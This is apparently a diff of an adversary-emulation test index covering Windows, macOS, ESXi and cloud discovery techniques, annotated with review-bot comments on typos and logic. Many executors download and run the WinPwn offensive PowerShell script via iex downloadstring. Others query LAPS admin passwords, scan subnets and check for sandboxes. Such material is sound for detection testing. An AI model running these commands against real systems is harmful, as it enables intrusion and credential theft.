- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100503,7 +101305,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100651,7 +101453,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
name: powershell
@@ -100728,7 +101529,7 @@ discovery:
default: "$env:computername"
executor:
command: 'Get-ADComputer #{hostname} -Properties *'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
@@ -100744,7 +101545,7 @@ discovery:
default: "$env:computername"
executor:
command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and
@@ -100758,7 +101559,7 @@ discovery:
executor:
command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties
*
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind all properties
@@ -100773,7 +101574,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
domain:
description: Domain of the host
type: string
@@ -100783,7 +101584,7 @@ discovery:
-h #{domain} -s subtree -f "objectclass=computer" *
'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
@@ -100798,7 +101599,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
domain:
description: Domain of the host
type: string
@@ -100808,7 +101609,7 @@ discovery:
-h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Active Directory Domain Search
@@ -101160,6 +101961,48 @@ discovery:
'
name: command_prompt
- name: ESXi - Local Account Discovery via ESXCLI
auto_generated_guid: 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c
description: |
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli system account list"
'
name: command_prompt
elevation_required: false
T1497.001:
technique:
modified: '2024-09-12T15:50:18.047Z'
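Review bot: the description ends with a stray `"` after the reference link (`...#account%20enumeration)"`), which will render verbatim in the generated docs; remove it. "privilege user account" in the vm_user description should read "privileged user account", and as with the vim-cmd test, `plink -batch` refuses an uncached host key, so the first run against a new ESXi host fails unless the key has been accepted beforehand.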
@@ -101307,7 +102150,7 @@ discovery:
Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
if($error) {echo "Virtualization Environment detected"}
cleanup_command: "$error.clear()\n"
- name: Detect Virtualization Environment (MacOS)
- name: Detect Virtualization Environment via ioreg
auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
description: 'ioreg contains registry entries for all the device drivers in
the system. If it''s a virtual machine, one of the device manufacturer will
@@ -101339,6 +102182,49 @@ discovery:
$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
- name: Detect Virtualization Environment using sysctl (hw.model)
auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
description: |
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
''Virtualization Environment detected''; fi;
'
- name: Check if System Integrity Protection is enabled
auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
description: "The latest versions of macOS have the System Integrity Protection
feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
''Possible Virtualization Environment detected''; fi;
'
- name: Detect Virtualization Environment using system_profiler
auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
description: "system_profiler provides system hardware and software configuration
and the Model Identifier should provide the value similar to (sysctl -n hw.model).
\nWe should be able to find whether virtualization is enabled by checking
whether the Model Identifier does not contain \"Mac\".\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
| grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
fi;
'
T1069.002:
technique:
modified: '2023-04-07T17:16:47.754Z'
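Review bot: the comma in the "Check if System Integrity Protection is enabled" description is misplaced: "for monitoring purposes the, SIP feature must be disabled" should read "for monitoring purposes, the SIP feature must be disabled". All three new macOS tests omit `elevation_required`, while the other tests in this file set it explicitly; `sysctl -n hw.model`, `csrutil status` and `system_profiler SPHardwareDataType` all run as an ordinary user, so `elevation_required: false` is the accurate value. Also, `csrutil status | grep -v 'enabled'` reports on any output line that lacks the word "enabled", so the message fires on every non-status line too; the "Possible" wording covers that, but the description could say the check is heuristic.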
@@ -101528,7 +102414,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
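Review bot: the only change in this hunk is the `default:` line for `arguments`, and the old and new versions render identically, so this is a whitespace-only or empty-versus-null change. If an empty default is intended, `default: ''` (as the `ip_address` argument later in this diff uses) is unambiguous and survives YAML round-tripping; otherwise this hunk, and the identical `default:` hunks elsewhere in the diff, are generator noise that should be dropped from the change set.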
@@ -102581,7 +103467,7 @@ discovery:
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
Upon execution avalaible network shares will be displayed in the powershell session
Upon execution available network shares will be displayed in the powershell session
supported_platforms:
- windows
input_arguments:
@@ -102598,7 +103484,7 @@ discovery:
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
description: |
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
Upon execution, avalaible network shares will be displayed in the powershell session
Upon execution, available network shares will be displayed in the powershell session
supported_platforms:
- windows
executor:
@@ -102609,7 +103495,7 @@ discovery:
- name: View available share drives
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
description: View information about all of the resources that are shared on
the local computer Upon execution, avalaible share drives will be displayed
the local computer Upon execution, available share drives will be displayed
in the powershell session
supported_platforms:
- windows
@@ -102677,7 +103563,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
name: powershell
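Review bot: removing the `$S3cur3Th1sSh1t_repo=` assignment is safe because nothing in the remaining executor reads it; the `downloadstring` call already hard-codes the raw URL pinned to commit 121dcee26a7aca368821563cbe92b2b5638c5773, so behaviour is unchanged and the pin is preserved. The same unused assignment is removed from every other WinPwn executor in this diff, and the same reasoning applies to each of them.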
@@ -102685,7 +103570,7 @@ discovery:
auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
description: |
Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip
Upon execution avalaible network shares will be displayed in the commandline session
Upon execution available network shares will be displayed in the commandline session
supported_platforms:
- windows
input_arguments:
@@ -102836,7 +103721,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput
name: powershell
@@ -103159,7 +104043,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput
name: powershell
@@ -103171,7 +104054,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput
name: powershell
@@ -103182,7 +104064,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput
cleanup_command: |-
@@ -103199,7 +104080,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput
name: powershell
@@ -103211,7 +104091,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive
name: powershell
@@ -103223,7 +104102,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput
name: powershell
@@ -103235,7 +104113,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
name: powershell
@@ -103288,7 +104165,7 @@ discovery:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -103592,7 +104469,37 @@ discovery:
- windows
executor:
name: command_prompt
command: powershell.exe -c "gdr -PSProvider 'FileSystem'"
command: 'powershell.exe -c "gdr -PSProvider ''FileSystem''"
'
- name: Discover OS Product Name via Registry
auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
description: |
Identify the Operating System Product Name via registry with the reg.exe command.
Upon execution, the OS Product Name will be displayed.
supported_platforms:
- windows
executor:
command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
ProductName
'
name: command_prompt
elevation_required: false
- name: Discover OS Build Number via Registry
auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
description: |
Identify the Operating System Build Number via registry with the reg.exe command.
Upon execution, the OS Build Number will be displayed.
supported_platforms:
- windows
executor:
command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
CurrentBuildNumber
'
name: command_prompt
elevation_required: false
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
@@ -104588,7 +105495,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -104896,7 +105803,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -104928,7 +105835,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -106778,7 +107685,59 @@ discovery:
executor:
name: command_prompt
elevation_required: false
command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
command: 'PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
'
- name: Discover System Language with WMIC
auto_generated_guid: 4758003d-db14-4959-9c0f-9e87558ac69e
description: "WMIC (Windows Management Instrumentation Command-line) is a command-line
tool that provides a simplified interface to query and manage Windows system
configurations, processes, and hardware information using WMI. \n\nThe command
in this test retrieves information about the system's locale, operating system
language, and multilingual user interface (MUI) languages.\n"
supported_platforms:
- windows
input_arguments:
target_host:
description: "The host that will be queried.\n\nIf the host contains special
characters, it may need to be wrapped in double quotes or double + single
quotes. \n\nFor example: \"DESKTOP-123\" or \"'DESKTOP-123'\".\n"
type: string
default: localhost
format_style:
description: You can specify multipe output formats for wmic such as table,
list and csv.
type: string
default: table
executor:
name: command_prompt
elevation_required: false
command: 'wmic /node:#{target_host} os get Locale,OSLanguage,MUILanguages
/format:#{format_style}
'
- name: Discover System Language with Powershell
auto_generated_guid: 1f23bfe8-36d4-49ce-903a-19a1e8c6631b
description: "This PowerShell script collects key system settings, such as the
UI language, user language preferences, system locale, current culture, UI
culture, and time zone, into a hash table. \n\nIt then outputs these settings
in a readable key-value format directly to the terminal. The script is simple
and efficient for quickly displaying system configuration details.\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |-
$info = @{
UILanguage = Get-WinUILanguageOverride
UserLanguages = (Get-WinUserLanguageList).LanguageTag -join ', '
SystemLocale = Get-WinSystemLocale
CurrentCulture = [System.Globalization.CultureInfo]::CurrentCulture.Name
CurrentUICulture = [System.Globalization.CultureInfo]::CurrentUICulture.Name
TimeZone = (Get-TimeZone).Id
}
$info.GetEnumerator() | ForEach-Object { "$($_.Name): $($_.Value)" }
T1012:
technique:
modified: '2023-04-03T18:56:37.011Z'
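Review bot: in the PowerShell test, `Get-WinUILanguageOverride` returns nothing unless a per-user UI language override has been configured, so `UILanguage` will be blank on most hosts even though the description promises the UI language; `(Get-UICulture).Name`, or the `CurrentUICulture` value the script already collects, is the reliable source. In the WMIC test, `wmic.exe` is deprecated and no longer installed by default on the latest Windows 11 builds, so add a dependency with a `where wmic` style `prereq_command` or note the limitation in the description; also fix "multipe" in the `format_style` description.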
@@ -107405,7 +108364,7 @@ discovery:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -107417,7 +108376,7 @@ discovery:
subscription_name:
description: Azure subscription name to scan
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -107452,6 +108411,115 @@ discovery:
'
name: powershell
- name: AWS - Enumerate common cloud services
auto_generated_guid: aa8b9bcc-46fa-4a59-9237-73c7b93a980c
description: 'Upon successful execution, this test will enumerate common resources
that are contained within a valid AWS account.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
regions:
description: AWS regions
type: string
default: us-east-1,us-east-2,us-west-1,us-west-2
output_directory:
description: Directory to output results to
type: string
default: "$env:TMPDIR/aws_discovery"
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
executor:
command: |
Import-Module "PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$regions = "#{regions}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile
Get-AWSDiscoveryData -Regions $regions -OutputDirectory "#{output_directory}"
Remove-BlankFiles -OutputDirectory "#{output_directory}"
name: powershell
- name: Azure - Enumerate common cloud services
auto_generated_guid: 58f57c8f-db14-4e62-a4d3-5aaf556755d7
description: 'Upon successful execution, this test will enumerate common resources
that are contained within a valid Azure subscription.
'
supported_platforms:
- iaas:azure
input_arguments:
client_id:
description: Azure AD client ID
type: string
default:
client_secret:
description: Azure AD client secret
type: string
default:
tenant_id:
description: Azure AD tenant ID
type: string
default:
cloud:
description: Azure cloud environment
type: string
default: AzureCloud
output_directory:
description: Directory to output results to
type: string
default: "$env:TMPDIR/azure_discovery"
dependency_executor_name: powershell
dependencies:
- description: 'The Az module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name Az -Force
'
executor:
command: |
Import-Module "PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"
$client_id = "#{client_id}"
$client_secret = "#{client_secret}"
$tenant_id = "#{tenant_id}"
$environment = "#{cloud}"
Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment
Get-AzureDiscoveryData -OutputDirectory "#{output_directory}" -Environment $environment
Remove-BlankFiles -OutputDirectory "#{output_directory}"
name: powershell
T1018:
technique:
modified: '2023-08-14T19:08:59.741Z'
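Review bot: the `output_directory` defaults `$env:TMPDIR/aws_discovery` and `$env:TMPDIR/azure_discovery` only resolve on macOS and Linux, where TMPDIR is set; on Windows PowerShell `$env:TMPDIR` is normally empty, so the path collapses to `/aws_discovery` at the drive root. Both executors are `powershell` with no host platform restriction, so use `$env:TEMP` or `[IO.Path]::GetTempPath()` (for example `default: "$env:TEMP/aws_discovery"`). The Azure test also leaves `client_id`, `client_secret` and `tenant_id` with empty defaults and no prereq that they were supplied, so a run with defaults fails inside `Set-AzureAuthentication` rather than at the prereq stage; a `prereq_command` that checks the three values are non-empty gives a clearer failure.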
@@ -107756,7 +108824,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -107788,7 +108856,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -108234,7 +109302,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
name: powershell
@@ -108246,7 +109313,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
name: powershell
@@ -108259,7 +109325,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
name: powershell
@@ -108271,7 +109336,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell
@@ -108322,7 +109386,9 @@ discovery:
input_arguments:
ip_address:
description: IP-Address within the target subnet. Default is empty and script
tries to determine local IP address of attacking machine.
tries to determine local IP address of attacking machine. A comma separated
list of targe IPs is also accepted (useful to simulate a wider scan while
only scanning key host e.g., honeypots)
type: string
default: ''
port_list:
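Review bot: typo in the updated `ip_address` description: "targe IPs" should be "target IPs", and "only scanning key host" should be "only scanning key hosts" to agree with "honeypots".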
@@ -108334,33 +109400,58 @@ discovery:
type: string
default: '200'
executor:
command: |
command: |-
$ipAddr = "#{ip_address}"
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
$ports = #{port_list}
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
name: powershell
- name: Remote Desktop Services Discovery via PowerShell
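Review bot: the `elseif ($ipAddr -notlike "*,*")` condition is the exact complement of the preceding `if ($ipAddr -like "*,*")`, so the final `else { Write-Host "[Error] Invalid Inputs"; exit 1 }` branch can never execute; either collapse the `elseif` to a plain `else`, or make the validation real, for instance by rejecting entries in `$ip_list` that fail `[ipaddress]::TryParse`. Two smaller points in the new comma-list branch: entries are trimmed but empty ones are not skipped, so a trailing comma in `#{ip_address}` produces a connect attempt with an empty host that the empty `catch {}` silently hides; and `$tcp` is only closed on the connected path, so a /24 sweep times out thousands of sockets without disposing them. Call `$tcp.Dispose()` after the check (or use `finally`) in both loops.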
@@ -108377,6 +109468,41 @@ discovery:
'
name: powershell
elevation_required: true
- name: Port Scan using nmap (Port range)
auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
description: 'Scan multiple ports to check for listening ports with nmap
'
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host(s) to scan.
type: string
default: 127.0.0.1
port_range:
description: Port range(s) to scan.
type: string
default: 0-65535
dependency_executor_name: sh
dependencies:
- description: 'Check if nmap command exists on the machine
'
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
executor:
command: 'nmap -Pn -sV -p #{port_range} #{host}
'
elevation_required: true
name: sh
T1518:
technique:
modified: '2024-04-16T00:16:06.689Z'
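Review bot: the default `port_range` of `0-65535` combined with `-sV` runs version detection against every port on the host, which takes a long time even for 127.0.0.1 and makes the default impractical; the other port-scan tests in this file default to a short port list, so a narrower default with the full range documented as an option would be more usable. `elevation_required: true` is not strictly required for `-Pn -sV -p` (nmap falls back to a connect scan when unprivileged), but keeping it gives the SYN-scan behaviour nmap uses as root, so the description should say which is expected, and it should gain the "Upon execution, ..." line the other tests carry.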
@@ -108473,7 +109599,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
name: powershell
@@ -108485,7 +109610,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
name: powershell
@@ -108496,7 +109620,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
name: powershell
@@ -108812,6 +109935,20 @@ discovery:
'
name: command_prompt
- name: Discover System Time Zone via Registry
auto_generated_guid: 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47
description: |
Identify the Operating System Time Zone via registry with the reg.exe command.
Upon execution, the system Time Zone will be shown.
supported_platforms:
- windows
executor:
